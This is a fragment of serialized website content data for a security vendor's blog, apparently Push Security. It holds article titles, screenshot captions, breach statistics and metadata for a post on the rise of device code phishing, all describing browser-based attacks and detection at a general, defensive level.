:173,"value":2697,"marks":6469,"data":6470},[],{},{"nodeType":173,"value":2701,"marks":6472,"data":6474},[6473],{"type":370},{},{"nodeType":173,"value":2706,"marks":6476,"data":6477},[],{},{"nodeType":173,"value":2578,"marks":6479,"data":6481},[6480],{"type":370},{},{"nodeType":173,"value":2714,"marks":6483,"data":6484},[],{},{"nodeType":173,"value":2718,"marks":6486,"data":6488},[6487],{"type":370},{},{"nodeType":173,"value":2723,"marks":6490,"data":6491},[],{},{"nodeType":312,"data":6493,"content":6496},{"target":6494},{"sys":6495},{"id":2730,"type":317,"linkType":318},[],{"nodeType":178,"data":6498,"content":6499},{},[6500,6503,6507,6510,6514],{"nodeType":173,"value":2736,"marks":6501,"data":6502},[],{},{"nodeType":173,"value":2740,"marks":6504,"data":6506},[6505],{"type":370},{},{"nodeType":173,"value":1464,"marks":6508,"data":6509},[],{},{"nodeType":173,"value":2748,"marks":6511,"data":6513},[6512],{"type":370},{},{"nodeType":173,"value":2753,"marks":6515,"data":6516},[],{},{"nodeType":178,"data":6518,"content":6519},{},[6520],{"nodeType":173,"value":2760,"marks":6521,"data":6522},[],{},{"nodeType":231,"data":6524,"content":6525},{},[],{"nodeType":169,"data":6527,"content":6528},{},[6529],{"nodeType":173,"value":2770,"marks":6530,"data":6532},[6531],{"type":370},{},{"nodeType":178,"data":6534,"content":6535},{},[6536],{"nodeType":173,"value":2778,"marks":6537,"data":6538},[],{},{"nodeType":178,"data":6540,"content":6541},{},[6542,6545,6549],{"nodeType":173,"value":2785,"marks":6543,"data":6544},[],{},{"nodeType":173,"value":2789,"marks":6546,"data":6548},[6547],{"type":370},{},{"nodeType":173,"value":2794,"marks":6550,"data":6551},[],{},{"nodeType":312,"data":6553,"content":6556},{"target":6554},{"sys":6555},{"id":2801,"type":317,"linkType":318},[],{"nodeType":178,"data":6558,"content":6559},{},[6560],{"nodeType":173,"value":2807,"marks":6561,"data":6562},[],{},{"nodeType":178,"data":6564,"content":6565},{},[6566],{"nodeType":173,"value":2814,"marks":6567,"data":6568},[],{},{"nodeType":231,"data":6570,"content":6571},{},[],{"nodeType":169,"data":6573,"content":6574},{},[6575],{"nodeType":173,"value":2824,"marks":6576,"data":6578},[6577],{"type":370},{},{"nodeType":178,"data":6580,"content":6581},{},[6582,6585,6591],{"nodeType":173,"value":2832,"marks":6583,"data":6584},[],{},{"nodeType":186,"data":6586,"content":6587},{"uri":86},[6588],{"nodeType":173,"value":2839,"marks":6589,"data":6590},[],{},{"nodeType":173,"value":2843,"marks":6592,"data":6593},[],{},{"nodeType":178,"data":6595,"content":6596},{},[6597],{"nodeType":173,"value":2850,"marks":6598,"data":6599},[],{},{"nodeType":178,"data":6601,"content":6602},{},[6603,6606,6612,6615,6621,6624,6630],{"nodeType":173,"value":2857,"marks":6604,"data":6605},[],{},{"nodeType":186,"data":6607,"content":6608},{"uri":2862},[6609],{"nodeType":173,"value":2865,"marks":6610,"data":6611},[],{},{"nodeType":173,"value":2869,"marks":6613,"data":6614},[],{},{"nodeType":186,"data":6616,"content":6617},{"uri":2874},[6618],{"nodeType":173,"value":2877,"marks":6619,"data":6620},[],{},{"nodeType":173,"value":2881,"marks":6622,"data":6623},[],{},{"nodeType":186,"data":6625,"content":6626},{"uri":2886},[6627],{"nodeType":173,"value":2889,"marks":6628,"data":6629},[],{},{"nodeType":173,"value":1477,"marks":6631,"data":6632},[],{},{"entries":6634},{"inline":6635,"hyperlink":6636,"block":6699},[],[6637,6641,6645,6649,6653,6659,6664,6669,6674,6679,6684,6689,6694],{"sys":6638,"__typename":1528,"title":6639,"slug":6640},{"id":1702},"Google Search malvertising campaign continues, now impersonating Ahrefs","google-search-malvertising-campaign-continues-now-impersonating-ahrefs",{"sys":6642,"__typename":1528,"title":6643,"slug":6644},{"id":2023},"Push + Network Security: The gap between seeing the packet and securing the session","push-plus-network-security",{"sys":6646,"__typename":1528,"title":6647,"slug":6648},{"id":2044},"Push + Endpoint Security: Extending detection and response to the browser","push-plus-endpoint-security",{"sys":6650,"__typename":1528,"title":6651,"slug":6652},{"id":2058},"Push + Cloud Security: What do you do when bad looks normal?","push-plus-cloud-security",{"sys":6654,"__typename":6655,"title":6656,"slug":6657,"articleId":6658},{"id":2148},"HelpArticle","Can I use Push to detect phishing tools like Evilginx, Modlishka, NakedPages, or Muraena?","can-i-use-push-to-detect-phishing-tools-like-evilnovnc-and-evilginx",10113,{"sys":6660,"__typename":6655,"title":6661,"slug":6662,"articleId":6663},{"id":2171},"How does Push detect cloned login pages?","how-does-push-detect-cloned-login-pages",10117,{"sys":6665,"__typename":6655,"title":6666,"slug":6667,"articleId":6668},{"id":2194},"How does Push detect malicious browser extensions?","how-does-push-detect-malicious-browser-extensions",10148,{"sys":6670,"__typename":6655,"title":6671,"slug":6672,"articleId":6673},{"id":2215},"How does Push detect attacks like ClickFix and FileFix?","how-does-push-detect-attacks-like-clickfix-and-filefix",10141,{"sys":6675,"__typename":6655,"title":6676,"slug":6677,"articleId":6678},{"id":2405},"How does Push protect passwords from being reused or phished?","how-does-push-detect-and-prevent-phishing-attacks",10109,{"sys":6680,"__typename":6655,"title":6681,"slug":6682,"articleId":6683},{"id":2429},"How does MFA enforcement work?","how-does-mfa-enforcement-work",10121,{"sys":6685,"__typename":6655,"title":6686,"slug":6687,"articleId":6688},{"id":2442},"How does strong password enforcement work?","how-does-strong-password-enforcement-work",10129,{"sys":6690,"__typename":6655,"title":6691,"slug":6692,"articleId":6693},{"id":2466},"What can I use the app banner for? Templates and examples","what-can-i-use-the-app-banner-for-templates-and-examples",10106,{"sys":6695,"__typename":6655,"title":6696,"slug":6697,"articleId":6698},{"id":2489},"Can Push detect and disable other installed browser extensions?","can-push-detect-other-installed-browser-extensions",10138,[6700,6736,6740,6759,6767,6792,6831,6838,6846,6854,6862,6870,6878],{"sys":6701,"__typename":5311,"content":6702,"name":6735,"title":118},{"id":1576},{"json":6703},{"nodeType":165,"data":6704,"content":6705},{},[6706],{"nodeType":178,"data":6707,"content":6708},{},[6709,6712,6720,6724,6731],{"nodeType":173,"value":37,"marks":6710,"data":6711},[],{},{"nodeType":186,"data":6713,"content":6715},{"uri":6714},"https://www.crowdstrike.com/explore/2026-global-threat-report?utm_medium=dir",[6716],{"nodeType":173,"value":6717,"marks":6718,"data":6719},"Crowdstrike reports",[],{},{"nodeType":173,"value":6721,"marks":6722,"data":6723}," that valid account abuse accounted for 35% of incidents in 2025, while ",[],{},{"nodeType":186,"data":6725,"content":6726},{"uri":1297},[6727],{"nodeType":173,"value":6728,"marks":6729,"data":6730},"Verizon reports",[],{},{"nodeType":173,"value":6732,"marks":6733,"data":6734}," that identity is now the primary breach vector observed across all methods.",[],{},"Guide: Protecting Users IB 1",{"sys":6737,"__typename":5434,"title":6738,"arcadeDemoUrl":6739,"playText":5437},{"id":1603},"Custom branding for Push controls","https://demo.arcade.software/kBqjoJqArDTsUtB6HHwR?embed",{"sys":6741,"__typename":5311,"content":6742,"name":6758,"title":118},{"id":1627},{"json":6743},{"nodeType":165,"data":6744,"content":6745},{},[6746],{"nodeType":178,"data":6747,"content":6748},{},[6749,6753],{"nodeType":173,"value":6750,"marks":6751,"data":6752},"It's harder than ever to identify malicious scenarios when browsing the web as part of your routine, daily activities — and the list of attacks to be aware of is growing every day. ",[],{},{"nodeType":173,"value":6754,"marks":6755,"data":6757},"It was hard enough to train users not to click links in emails when that was pretty much the only thing they had to watch out for.  ",[6756],{"type":370},{},"Guide: Protecting Users IB 3",{"sys":6760,"__typename":5345,"title":6761,"caption":6762,"layoutMode":118,"file":6763},{"id":1633},"Don't make employees the weak link image - blog - custom branding","It's harder than ever for users to identify malicious content on the web, with attackers abusing an ever-increasing list of actions that feel pretty normal to users, with a wide range of malicious payloads.",{"url":6764,"width":6765,"height":6766},"https://images.ctfassets.net/y1cdw1ablpvd/2aSm6QBWDOU6JBtOLfyp6R/d63cacab198ef9b325cbcfdbe0373b5a/Browser_Attacks_Targeting_Users__1_.png",4046,2160,{"sys":6768,"__typename":5311,"content":6769,"name":6791,"title":118},{"id":1929},{"json":6770},{"nodeType":165,"data":6771,"content":6772},{},[6773],{"nodeType":178,"data":6774,"content":6775},{},[6776,6780,6787],{"nodeType":173,"value":6777,"marks":6778,"data":6779},"Learn more about the browser-based attack techniques driving the biggest breaches of the last year in our ",[],{},{"nodeType":186,"data":6781,"content":6782},{"uri":86},[6783],{"nodeType":173,"value":6784,"marks":6785,"data":6786},"2026 Browser Attack Techniques",[],{},{"nodeType":173,"value":6788,"marks":6789,"data":6790}," ebook.",[],{},"Browser attack techniques ebook callout",{"sys":6793,"__typename":5311,"content":6794,"name":6830,"title":118},{"id":2072},{"json":6795},{"nodeType":165,"data":6796,"content":6797},{},[6798],{"nodeType":178,"data":6799,"content":6800},{},[6801,6805,6814,6818,6826],{"nodeType":173,"value":6802,"marks":6803,"data":6804},"The Push research team has written extensively about how cloud-first operators like ",[],{},{"nodeType":1698,"data":6806,"content":6809},{"target":6807},{"sys":6808},{"id":519,"type":317,"linkType":318},[6810],{"nodeType":173,"value":6811,"marks":6812,"data":6813},"Scattered Lapsus$ Hunters",[],{},{"nodeType":173,"value":6815,"marks":6816,"data":6817}," use a variety of methods to ",[],{},{"nodeType":186,"data":6819,"content":6821},{"uri":6820},"https://phishing-techniques.pushsecurity.com/",[6822],{"nodeType":173,"value":6823,"marks":6824,"data":6825},"evade existing security controls",[],{},{"nodeType":173,"value":6827,"marks":6828,"data":6829},", if you’d like to dig into the details.",[],{},"Guide: Protecting Users IB 2",{"sys":6832,"__typename":5345,"title":6833,"caption":6834,"layoutMode":118,"file":6835},{"id":2272},"Sample detection - blog article - custom branding","Sample detection details in the Push admin console for a blocked phishing event",{"url":6836,"width":5358,"height":6837},"https://images.ctfassets.net/y1cdw1ablpvd/6k8qVn1iYXbBl6lcHvphIa/dd802537d883cf6ddafdd78034c3412a/sample_detection.png",766,{"sys":6839,"__typename":5345,"title":6840,"caption":6841,"layoutMode":118,"file":6842},{"id":2307},"Sample ClickFix detection - blog article - custom branding","Sample screenshot captured from a malicious copy-paste attack",{"url":6843,"width":6844,"height":6845},"https://images.ctfassets.net/y1cdw1ablpvd/3xaJZGyhSbqqLZ7iyiqb40/427c9eeb7312dc1d85d57b10b2ffec11/clickfix_screenshot_example.png",947,244,{"sys":6847,"__typename":5345,"title":6848,"caption":6849,"layoutMode":118,"file":6850},{"id":2362},"Sample phishing block page - blog article - custom branding","Sample phishing block page with custom branding",{"url":6851,"width":6852,"height":6853},"https://images.ctfassets.net/y1cdw1ablpvd/2eQNuARuzPujGm1tfYxFhf/1ebce9e33cf89368d1e9ce9104382641/phishing_block_page_branded.png",1274,719,{"sys":6855,"__typename":5345,"title":6856,"caption":6857,"layoutMode":118,"file":6858},{"id":2590},"MFA enforcement banner example - blog article - custom branding","MFA enforcement banner with custom branding and dark theme option",{"url":6859,"width":6860,"height":6861},"https://images.ctfassets.net/y1cdw1ablpvd/8srMEvq3vFJQiEyIaESDw/fdff9a4f3bd0eadb5f58ff9fac4ada74/MFA_enforcement_banner_branded_sample.png",1472,756,{"sys":6863,"__typename":5345,"title":6864,"caption":6865,"layoutMode":118,"file":6866},{"id":2643},"Sample blocking banner - blog article - custom branding","Sample blocking banner",{"url":6867,"width":6868,"height":6869},"https://images.ctfassets.net/y1cdw1ablpvd/2b3bGaN3vQBXn5SL8BlbzZ/fbe21cc6e6387856e2d3a56ffb6a1e82/banner_example_branded_block.png",1304,812,{"sys":6871,"__typename":5345,"title":6872,"caption":6873,"layoutMode":118,"file":6874},{"id":2730},"Rule configuration example - blog article - custom branding","Rule configuration slideout for Phishing tool detection",{"url":6875,"width":6876,"height":6877},"https://images.ctfassets.net/y1cdw1ablpvd/2O0ptkRr7E0QPlfABl3zq9/1e2204b441b50129f543177a99c46fa6/config_rule_scope_mode_example.png",739,820,{"sys":6879,"__typename":5345,"title":6880,"caption":6881,"layoutMode":118,"file":6882},{"id":2801},"Branding settings - blog article - custom branding","Branding configuration options for banners and block pages",{"url":6883,"width":6884,"height":6885},"https://images.ctfassets.net/y1cdw1ablpvd/4EX3DqVhvOMCyNFYSBJ1rF/caabcddde02e65e363f2354aa7ab2be0/branding_settings.png",995,817,"content:blog:guide-how-to-use-push-controls-to-protect-your-users-from-modern-attacks.json","blog/guide-how-to-use-push-controls-to-protect-your-users-from-modern-attacks.json","blog/guide-how-to-use-push-controls-to-protect-your-users-from-modern-attacks",{"_path":6890,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":6891,"ogImage":118,"summary":6894,"title":6905,"subtitle":118,"metaTitle":6906,"synopsis":6907,"hashTags":118,"publishedDate":6908,"slug":6909,"tagsCollection":6910,"relatedBlogPostsCollection":6916,"authorsCollection":9239,"content":9243,"_id":12100,"_type":5439,"_source":5440,"_file":12101,"_stem":12102,"_extension":5439},"/blog/device-code-phishing",{"id":6892,"publishedAt":6893},"5DmCqTU2Tg4adYScA5vT2x","2026-04-07T09:00:13.964Z",{"json":6895},{"data":6896,"content":6897,"nodeType":165},{},[6898],{"data":6899,"content":6900,"nodeType":178},{},[6901],{"data":6902,"marks":6903,"value":6904,"nodeType":173},{},[],"Device code phishing is an account takeover technique that abuses the OAuth 2.0 Device Authorization Grant to steal access tokens while bypassing standard access controls (like passwords, MFA, and even passkeys).","Device code phishing attacks have skyrocketed: here’s what you need to know","Analysing the rise in device code phishing attacks in 2026","Device code phishing is seeing a huge spike in adoption in 2026, enabling attackers to steal access tokens while bypassing standard access controls.","2026-04-04T00:00:00.000Z","device-code-phishing",{"items":6911},[6912,6914],{"sys":6913,"name":505},{"id":504},{"sys":6915,"name":509},{"id":508},{"items":6917},[6918,7746,8616],{"__typename":1528,"sys":6919,"content":6920,"title":1480,"synopsis":1481,"hashTags":118,"publishedDate":1482,"slug":1483,"tagsCollection":7736,"authorsCollection":7742},{"id":519},{"json":6921},{"nodeType":165,"data":6922,"content":6923},{},[6924,6930,6936,6942,6945,6952,6958,6964,6969,6975,6980,6996,7002,7012,7015,7022,7028,7041,7047,7057,7062,7065,7072,7079,7084,7092,7108,7116,7122,7130,7145,7153,7159,7167,7193,7201,7207,7215,7231,7236,7244,7250,7258,7291,7294,7301,7309,7325,7333,7339,7347,7373,7378,7386,7392,7397,7400,7407,7415,7421,7472,7477,7480,7487,7495,7501,7506,7509,7516,7522,7528,7588,7594,7649,7655,7658,7665,7671,7677,7682,7685,7692,7698,7704,7710],{"nodeType":178,"data":6925,"content":6926},{},[6927],{"nodeType":173,"value":528,"marks":6928,"data":6929},[],{},{"nodeType":178,"data":6931,"content":6932},{},[6933],{"nodeType":173,"value":535,"marks":6934,"data":6935},[],{},{"nodeType":178,"data":6937,"content":6938},{},[6939],{"nodeType":173,"value":542,"marks":6940,"data":6941},[],{},{"nodeType":231,"data":6943,"content":6944},{},[],{"nodeType":169,"data":6946,"content":6947},{},[6948],{"nodeType":173,"value":552,"marks":6949,"data":6951},[6950],{"type":370},{},{"nodeType":178,"data":6953,"content":6954},{},[6955],{"nodeType":173,"value":560,"marks":6956,"data":6957},[],{},{"nodeType":178,"data":6959,"content":6960},{},[6961],{"nodeType":173,"value":567,"marks":6962,"data":6963},[],{},{"nodeType":312,"data":6965,"content":6968},{"target":6966},{"sys":6967},{"id":574,"type":317,"linkType":318},[],{"nodeType":178,"data":6970,"content":6971},{},[6972],{"nodeType":173,"value":580,"marks":6973,"data":6974},[],{},{"nodeType":312,"data":6976,"content":6979},{"target":6977},{"sys":6978},{"id":587,"type":317,"linkType":318},[],{"nodeType":178,"data":6981,"content":6982},{},[6983,6986,6993],{"nodeType":173,"value":593,"marks":6984,"data":6985},[],{},{"nodeType":186,"data":6987,"content":6988},{"uri":598},[6989],{"nodeType":173,"value":601,"marks":6990,"data":6992},[6991],{"type":194},{},{"nodeType":173,"value":606,"marks":6994,"data":6995},[],{},{"nodeType":178,"data":6997,"content":6998},{},[6999],{"nodeType":173,"value":613,"marks":7000,"data":7001},[],{},{"nodeType":178,"data":7003,"content":7004},{},[7005,7008],{"nodeType":173,"value":620,"marks":7006,"data":7007},[],{},{"nodeType":173,"value":624,"marks":7009,"data":7011},[7010],{"type":370},{},{"nodeType":231,"data":7013,"content":7014},{},[],{"nodeType":169,"data":7016,"content":7017},{},[7018],{"nodeType":173,"value":635,"marks":7019,"data":7021},[7020],{"type":370},{},{"nodeType":178,"data":7023,"content":7024},{},[7025],{"nodeType":173,"value":643,"marks":7026,"data":7027},[],{},{"nodeType":178,"data":7029,"content":7030},{},[7031,7034,7038],{"nodeType":173,"value":650,"marks":7032,"data":7033},[],{},{"nodeType":173,"value":654,"marks":7035,"data":7037},[7036],{"type":370},{},{"nodeType":173,"value":659,"marks":7039,"data":7040},[],{},{"nodeType":178,"data":7042,"content":7043},{},[7044],{"nodeType":173,"value":666,"marks":7045,"data":7046},[],{},{"nodeType":178,"data":7048,"content":7049},{},[7050,7053],{"nodeType":173,"value":673,"marks":7051,"data":7052},[],{},{"nodeType":173,"value":677,"marks":7054,"data":7056},[7055],{"type":370},{},{"nodeType":312,"data":7058,"content":7061},{"target":7059},{"sys":7060},{"id":685,"type":317,"linkType":318},[],{"nodeType":231,"data":7063,"content":7064},{},[],{"nodeType":169,"data":7066,"content":7067},{},[7068],{"nodeType":173,"value":694,"marks":7069,"data":7071},[7070],{"type":370},{},{"nodeType":235,"data":7073,"content":7074},{},[7075],{"nodeType":173,"value":702,"marks":7076,"data":7078},[7077],{"type":370},{},{"nodeType":312,"data":7080,"content":7083},{"target":7081},{"sys":7082},{"id":710,"type":317,"linkType":318},[],{"nodeType":178,"data":7085,"content":7086},{},[7087],{"nodeType":173,"value":716,"marks":7088,"data":7091},[7089,7090],{"type":370},{"type":194},{},{"nodeType":178,"data":7093,"content":7094},{},[7095,7098,7105],{"nodeType":173,"value":725,"marks":7096,"data":7097},[],{},{"nodeType":186,"data":7099,"content":7100},{"uri":730},[7101],{"nodeType":173,"value":733,"marks":7102,"data":7104},[7103],{"type":194},{},{"nodeType":173,"value":738,"marks":7106,"data":7107},[],{},{"nodeType":178,"data":7109,"content":7110},{},[7111],{"nodeType":173,"value":745,"marks":7112,"data":7115},[7113,7114],{"type":370},{"type":194},{},{"nodeType":178,"data":7117,"content":7118},{},[7119],{"nodeType":173,"value":754,"marks":7120,"data":7121},[],{},{"nodeType":178,"data":7123,"content":7124},{},[7125],{"nodeType":173,"value":761,"marks":7126,"data":7129},[7127,7128],{"type":370},{"type":194},{},{"nodeType":178,"data":7131,"content":7132},{},[7133,7136,7142],{"nodeType":173,"value":770,"marks":7134,"data":7135},[],{},{"nodeType":186,"data":7137,"content":7138},{"uri":775},[7139],{"nodeType":173,"value":778,"marks":7140,"data":7141},[],{},{"nodeType":173,"value":782,"marks":7143,"data":7144},[],{},{"nodeType":178,"data":7146,"content":7147},{},[7148],{"nodeType":173,"value":789,"marks":7149,"data":7152},[7150,7151],{"type":370},{"type":194},{},{"nodeType":178,"data":7154,"content":7155},{},[7156],{"nodeType":173,"value":798,"marks":7157,"data":7158},[],{},{"nodeType":178,"data":7160,"content":7161},{},[7162],{"nodeType":173,"value":805,"marks":7163,"data":7166},[7164,7165],{"type":370},{"type":194},{},{"nodeType":178,"data":7168,"content":7169},{},[7170,7173,7180,7183,7190],{"nodeType":173,"value":814,"marks":7171,"data":7172},[],{},{"nodeType":186,"data":7174,"content":7175},{"uri":819},[7176],{"nodeType":173,"value":822,"marks":7177,"data":7179},[7178],{"type":194},{},{"nodeType":173,"value":827,"marks":7181,"data":7182},[],{},{"nodeType":186,"data":7184,"content":7185},{"uri":832},[7186],{"nodeType":173,"value":835,"marks":7187,"data":7189},[7188],{"type":194},{},{"nodeType":173,"value":840,"marks":7191,"data":7192},[],{},{"nodeType":178,"data":7194,"content":7195},{},[7196],{"nodeType":173,"value":847,"marks":7197,"data":7200},[7198,7199],{"type":370},{"type":194},{},{"nodeType":178,"data":7202,"content":7203},{},[7204],{"nodeType":173,"value":856,"marks":7205,"data":7206},[],{},{"nodeType":178,"data":7208,"content":7209},{},[7210],{"nodeType":173,"value":863,"marks":7211,"data":7214},[7212,7213],{"type":370},{"type":194},{},{"nodeType":178,"data":7216,"content":7217},{},[7218,7221,7228],{"nodeType":173,"value":872,"marks":7219,"data":7220},[],{},{"nodeType":186,"data":7222,"content":7223},{"uri":832},[7224],{"nodeType":173,"value":835,"marks":7225,"data":7227},[7226],{"type":194},{},{"nodeType":173,"value":883,"marks":7229,"data":7230},[],{},{"nodeType":312,"data":7232,"content":7235},{"target":7233},{"sys":7234},{"id":890,"type":317,"linkType":318},[],{"nodeType":178,"data":7237,"content":7238},{},[7239],{"nodeType":173,"value":896,"marks":7240,"data":7243},[7241,7242],{"type":370},{"type":194},{},{"nodeType":178,"data":7245,"content":7246},{},[7247],{"nodeType":173,"value":905,"marks":7248,"data":7249},[],{},{"nodeType":178,"data":7251,"content":7252},{},[7253],{"nodeType":173,"value":912,"marks":7254,"data":7257},[7255,7256],{"type":370},{"type":194},{},{"nodeType":178,"data":7259,"content":7260},{},[7261,7264,7270,7273,7279,7282,7288],{"nodeType":173,"value":921,"marks":7262,"data":7263},[],{},{"nodeType":186,"data":7265,"content":7266},{"uri":926},[7267],{"nodeType":173,"value":929,"marks":7268,"data":7269},[],{},{"nodeType":173,"value":933,"marks":7271,"data":7272},[],{},{"nodeType":186,"data":7274,"content":7275},{"uri":938},[7276],{"nodeType":173,"value":941,"marks":7277,"data":7278},[],{},{"nodeType":173,"value":945,"marks":7280,"data":7281},[],{},{"nodeType":186,"data":7283,"content":7284},{"uri":950},[7285],{"nodeType":173,"value":953,"marks":7286,"data":7287},[],{},{"nodeType":173,"value":957,"marks":7289,"data":7290},[],{},{"nodeType":231,"data":7292,"content":7293},{},[],{"nodeType":235,"data":7295,"content":7296},{},[7297],{"nodeType":173,"value":967,"marks":7298,"data":7300},[7299],{"type":370},{},{"nodeType":178,"data":7302,"content":7303},{},[7304],{"nodeType":173,"value":975,"marks":7305,"data":7308},[7306,7307],{"type":370},{"type":194},{},{"nodeType":178,"data":7310,"content":7311},{},[7312,7315,7322],{"nodeType":173,"value":984,"marks":7313,"data":7314},[],{},{"nodeType":186,"data":7316,"content":7317},{"uri":989},[7318],{"nodeType":173,"value":992,"marks":7319,"data":7321},[7320],{"type":194},{},{"nodeType":173,"value":997,"marks":7323,"data":7324},[],{},{"nodeType":178,"data":7326,"content":7327},{},[7328],{"nodeType":173,"value":1004,"marks":7329,"data":7332},[7330,7331],{"type":370},{"type":194},{},{"nodeType":178,"data":7334,"content":7335},{},[7336],{"nodeType":173,"value":1013,"marks":7337,"data":7338},[],{},{"nodeType":178,"data":7340,"content":7341},{},[7342],{"nodeType":173,"value":1020,"marks":7343,"data":7346},[7344,7345],{"type":370},{"type":194},{},{"nodeType":178,"data":7348,"content":7349},{},[7350,7353,7360,7363,7370],{"nodeType":173,"value":1029,"marks":7351,"data":7352},[],{},{"nodeType":186,"data":7354,"content":7355},{"uri":1034},[7356],{"nodeType":173,"value":1037,"marks":7357,"data":7359},[7358],{"type":194},{},{"nodeType":173,"value":1042,"marks":7361,"data":7362},[],{},{"nodeType":186,"data":7364,"content":7365},{"uri":1047},[7366],{"nodeType":173,"value":1050,"marks":7367,"data":7369},[7368],{"type":194},{},{"nodeType":173,"value":1055,"marks":7371,"data":7372},[],{},{"nodeType":312,"data":7374,"content":7377},{"target":7375},{"sys":7376},{"id":1062,"type":317,"linkType":318},[],{"nodeType":178,"data":7379,"content":7380},{},[7381],{"nodeType":173,"value":1068,"marks":7382,"data":7385},[7383,7384],{"type":370},{"type":194},{},{"nodeType":178,"data":7387,"content":7388},{},[7389],{"nodeType":173,"value":1077,"marks":7390,"data":7391},[],{},{"nodeType":312,"data":7393,"content":7396},{"target":7394},{"sys":7395},{"id":1084,"type":317,"linkType":318},[],{"nodeType":231,"data":7398,"content":7399},{},[],{"nodeType":235,"data":7401,"content":7402},{},[7403],{"nodeType":173,"value":1093,"marks":7404,"data":7406},[7405],{"type":370},{},{"nodeType":178,"data":7408,"content":7409},{},[7410],{"nodeType":173,"value":1101,"marks":7411,"data":7414},[7412,7413],{"type":370},{"type":194},{},{"nodeType":178,"data":7416,"content":7417},{},[7418],{"nodeType":173,"value":1110,"marks":7419,"data":7420},[],{},{"nodeType":250,"data":7422,"content":7423},{},[7424,7437,7450],{"nodeType":254,"data":7425,"content":7426},{},[7427],{"nodeType":178,"data":7428,"content":7429},{},[7430,7434],{"nodeType":173,"value":1123,"marks":7431,"data":7433},[7432],{"type":370},{},{"nodeType":173,"value":1128,"marks":7435,"data":7436},[],{},{"nodeType":254,"data":7438,"content":7439},{},[7440],{"nodeType":178,"data":7441,"content":7442},{},[7443,7447],{"nodeType":173,"value":1138,"marks":7444,"data":7446},[7445],{"type":370},{},{"nodeType":173,"value":1143,"marks":7448,"data":7449},[],{},{"nodeType":254,"data":7451,"content":7452},{},[7453],{"nodeType":178,"data":7454,"content":7455},{},[7456,7460,7463,7469],{"nodeType":173,"value":1153,"marks":7457,"data":7459},[7458],{"type":370},{},{"nodeType":173,"value":1158,"marks":7461,"data":7462},[],{},{"nodeType":186,"data":7464,"content":7465},{"uri":1163},[7466],{"nodeType":173,"value":1166,"marks":7467,"data":7468},[],{},{"nodeType":173,"value":1170,"marks":7470,"data":7471},[],{},{"nodeType":312,"data":7473,"content":7476},{"target":7474},{"sys":7475},{"id":1177,"type":317,"linkType":318},[],{"nodeType":231,"data":7478,"content":7479},{},[],{"nodeType":235,"data":7481,"content":7482},{},[7483],{"nodeType":173,"value":1186,"marks":7484,"data":7486},[7485],{"type":370},{},{"nodeType":178,"data":7488,"content":7489},{},[7490],{"nodeType":173,"value":1194,"marks":7491,"data":7494},[7492,7493],{"type":370},{"type":194},{},{"nodeType":178,"data":7496,"content":7497},{},[7498],{"nodeType":173,"value":1203,"marks":7499,"data":7500},[],{},{"nodeType":312,"data":7502,"content":7505},{"target":7503},{"sys":7504},{"id":1210,"type":317,"linkType":318},[],{"nodeType":231,"data":7507,"content":7508},{},[],{"nodeType":169,"data":7510,"content":7511},{},[7512],{"nodeType":173,"value":1219,"marks":7513,"data":7515},[7514],{"type":370},{},{"nodeType":178,"data":7517,"content":7518},{},[7519],{"nodeType":173,"value":1227,"marks":7520,"data":7521},[],{},{"nodeType":178,"data":7523,"content":7524},{},[7525],{"nodeType":173,"value":1234,"marks":7526,"data":7527},[],{},{"nodeType":250,"data":7529,"content":7530},{},[7531,7550,7569],{"nodeType":254,"data":7532,"content":7533},{},[7534],{"nodeType":178,"data":7535,"content":7536},{},[7537,7540,7547],{"nodeType":173,"value":1247,"marks":7538,"data":7539},[],{},{"nodeType":186,"data":7541,"content":7542},{"uri":1252},[7543],{"nodeType":173,"value":1255,"marks":7544,"data":7546},[7545],{"type":194},{},{"nodeType":173,"value":1260,"marks":7548,"data":7549},[],{},{"nodeType":254,"data":7551,"content":7552},{},[7553],{"nodeType":178,"data":7554,"content":7555},{},[7556,7559,7566],{"nodeType":173,"value":1270,"marks":7557,"data":7558},[],{},{"nodeType":186,"data":7560,"content":7561},{"uri":1275},[7562],{"nodeType":173,"value":1278,"marks":7563,"data":7565},[7564],{"type":194},{},{"nodeType":173,"value":1260,"marks":7567,"data":7568},[],{},{"nodeType":254,"data":7570,"content":7571},{},[7572],{"nodeType":178,"data":7573,"content":7574},{},[7575,7578,7585],{"nodeType":173,"value":1292,"marks":7576,"data":7577},[],{},{"nodeType":186,"data":7579,"content":7580},{"uri":1297},[7581],{"nodeType":173,"value":1300,"marks":7582,"data":7584},[7583],{"type":194},{},{"nodeType":173,"value":1260,"marks":7586,"data":7587},[],{},{"nodeType":178,"data":7589,"content":7590},{},[7591],{"nodeType":173,"value":1311,"marks":7592,"data":7593},[],{},{"nodeType":250,"data":7595,"content":7596},{},[7597,7610,7623,7636],{"nodeType":254,"data":7598,"content":7599},{},[7600],{"nodeType":178,"data":7601,"content":7602},{},[7603,7607],{"nodeType":173,"value":1324,"marks":7604,"data":7606},[7605],{"type":370},{},{"nodeType":173,"value":1329,"marks":7608,"data":7609},[],{},{"nodeType":254,"data":7611,"content":7612},{},[7613],{"nodeType":178,"data":7614,"content":7615},{},[7616,7620],{"nodeType":173,"value":1339,"marks":7617,"data":7619},[7618],{"type":370},{},{"nodeType":173,"value":1344,"marks":7621,"data":7622},[],{},{"nodeType":254,"data":7624,"content":7625},{},[7626],{"nodeType":178,"data":7627,"content":7628},{},[7629,7633],{"nodeType":173,"value":1354,"marks":7630,"data":7632},[7631],{"type":370},{},{"nodeType":173,"value":1359,"marks":7634,"data":7635},[],{},{"nodeType":254,"data":7637,"content":7638},{},[7639],{"nodeType":178,"data":7640,"content":7641},{},[7642,7646],{"nodeType":173,"value":1369,"marks":7643,"data":7645},[7644],{"type":370},{},{"nodeType":173,"value":1374,"marks":7647,"data":7648},[],{},{"nodeType":178,"data":7650,"content":7651},{},[7652],{"nodeType":173,"value":1381,"marks":7653,"data":7654},[],{},{"nodeType":231,"data":7656,"content":7657},{},[],{"nodeType":169,"data":7659,"content":7660},{},[7661],{"nodeType":173,"value":1391,"marks":7662,"data":7664},[7663],{"type":370},{},{"nodeType":178,"data":7666,"content":7667},{},[7668],{"nodeType":173,"value":1399,"marks":7669,"data":7670},[],{},{"nodeType":178,"data":7672,"content":7673},{},[7674],{"nodeType":173,"value":1406,"marks":7675,"data":7676},[],{},{"nodeType":312,"data":7678,"content":7681},{"target":7679},{"sys":7680},{"id":1413,"type":317,"linkType":318},[],{"nodeType":231,"data":7683,"content":7684},{},[],{"nodeType":169,"data":7686,"content":7687},{},[7688],{"nodeType":173,"value":1422,"marks":7689,"data":7691},[7690],{"type":370},{},{"nodeType":178,"da